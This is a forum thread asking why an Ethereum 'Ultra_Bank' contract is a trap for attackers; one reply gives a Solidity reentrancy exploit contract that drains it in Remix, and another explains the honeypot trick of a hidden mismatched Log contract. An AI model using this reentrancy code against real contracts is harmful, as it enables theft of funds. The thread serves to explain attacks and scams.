Why reentrancy is impossible here?

Yaroslav_Chikal · September 9, 2021, 12:12pm

My teacher says this contract is a trap for hacker. Can someone say why?
https://etherscan.io/address/0x14db723a05620d3bbe4303f9e566eb2c782e70f0#code

rmeissner · September 27, 2021, 2:42pm

Hmmmm I would be interested in this too … I was testing this on remix.ethereum.org and I could exploit this:

contract Exploiter {
    bool exploited = false;
    Ultra_Bank bank;

    function Exploiter(address _bank) public{
        bank = Ultra_Bank(_bank);
    }
    
    function() 
    public 
    payable
    {
        if (!exploited) {
            exploited = true;
            bank.Collect(1 ether);
        }
    }

    function Exploit()
    public
    {
        bank.Collect(1 ether);
    }
    
    function Put()
    public
    payable
    {
        bank.Put.value(1 ether)(0);
    }
    
    function Balance()
    public
    view
    returns (uint256)
    {
        return this.balance;
    }
}

This would be a simple example that works for exploiting the contract in remix.

transmissions11 · September 28, 2021, 4:59am

The contract creator constructs the contract with a Log contract that does not match the implementation shown in the file. It’s a clever trick, check out this video to learn more: